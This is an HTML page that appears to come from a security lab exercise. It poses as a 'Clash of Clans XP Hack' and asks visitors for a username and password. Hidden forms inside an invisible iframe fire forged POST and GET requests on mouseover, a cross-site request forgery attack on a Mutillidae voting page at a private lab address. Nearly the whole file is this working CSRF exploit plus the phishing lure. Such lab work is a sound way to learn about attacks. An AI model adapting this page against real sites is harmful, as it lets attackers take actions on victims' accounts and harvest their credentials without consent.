<html>

<head>
    <title>Clash of Clans XP Hack</title>
</head>

<body>
    <a href="index.html">Back to the main page</a>
    <center>
        <img src="coc.png" width="100px" height="100px">
        <h1>How many levels you wanna gain?</h1>
        <input type="radio" name="level" value="1">+1
        <input type="radio" name="level" value="2">+5
        <input type="radio" name="level" value="2">+10
        <input type="radio" name="level" value="2">+20
        <p>Enter your username and password:</p>
        <form id="dummy" action="success.html">
            <label for="username">Username: </label>
            <input type="text" name="username" value=""><br><br>
            <label for="password">Password: </label>
            <input type="password" name="password" value="">
        </form>
        <!-- Send GET and POST requests on mouseover -->
        <button type="submit" form="dummy" value="Submit"
            onmouseover="document.getElementById('csrf_post').submit();document.getElementById('csrf_get').submit();">See</button>
    </center>
    <!-- Form target frame to avoid redirection -->
    <iframe id="iframe" name="my_iframe" style="position: absolute;width:0;height:0;border:0;"></iframe>
    <!-- CSRF - Vote (POST) -->
    <form name="csrf_post" id="csrf_post" target="my_iframe" action="http://192.168.56.101/mutillidae/index.php"
        method="POST">
        <input type="hidden" name='page' value='user-poll.php'>
        <input type="hidden" name='csrf-token' value=''>
        <input type="hidden" name='choice' value='wireshark'>
        <input type="hidden" name='initials' value='hm'>
        <input type="hidden" name='user-poll-php-submit-button' value='Submit Vote'>
    </form>
    <!-- CSRF - Vote (GET) -->
    <form name="csrf_get" id="csrf_get" target="my_iframe" action="http://192.168.56.101/mutillidae/index.php"
        method="GET">
        <input type="hidden" name='page' value='user-poll.php'>
        <input type="hidden" name='csrf-token' value=''>
        <input type="hidden" name='choice' value='wireshark'>
        <input type="hidden" name='initials' value='hm'>
        <input type="hidden" name='user-poll-php-submit-button' value='Submit Vote'>
    </form>
</body>

</html>